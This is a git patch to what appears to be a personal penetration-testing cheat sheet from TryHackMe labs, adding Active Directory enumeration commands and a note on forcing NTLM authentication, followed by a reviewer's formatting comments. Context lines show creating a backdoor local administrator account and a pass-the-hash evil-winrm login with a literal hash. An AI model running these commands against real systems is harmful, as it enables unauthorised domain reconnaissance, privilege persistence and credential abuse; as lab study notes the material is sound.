From c74b537f2b42e00cfd0886144db6b6230436f706 Mon Sep 17 00:00:00 2001
From: leetcore
Date: Sat, 29 Jul 2023 00:06:56 +0200
Subject: [PATCH] add net user commands

---
 1337_file.txt | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/1337_file.txt b/1337_file.txt
index 4871686..2365953 100644
--- a/1337_file.txt
+++ b/1337_file.txt
@@ -125,6 +125,19 @@ Invoke-ShareFinder -CheckShareAccess
 net user NewUser MyPassword123! /add
 net localgroup Administrators /add NewUser
 
+When we provide the hostname, network authentication will attempt first to perform
+Kerberos authentication. Since Kerberos authentication uses hostnames embedded in the
+tickets, if we provide the IP instead, we can force the authentication type to be NTLM.
+
+net user /domain
+net user zoe.marshall /domain
+net group /domain
+net group "Tier 1 Admins" /domain
+
+net accounts /domain
+
+Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
+
 # EVIL WinRM
 Pass the hash (bash):
 evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc
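Review bot: The added Kerberos/NTLM paragraph does not say which command it applies to, and none of the `net ... /domain` lines under it takes a hostname or an IP, so it reads as an orphaned note. The new block also has no heading, unlike the `# EVIL WinRM` section that follows it. I would add a heading such as `# Domain enumeration (net.exe)` above `net user /domain`, and move the paragraph next to the command it describes or name that command in its first sentence. `Get-ADGroupMember` is a PowerShell cmdlet from the ActiveDirectory module rather than a cmd built-in, so a line like `# PowerShell, needs the ActiveDirectory module` above it would save a reader a failed paste. The rest of the file lies outside this hunk, so the heading style is inferred from the one heading visible here.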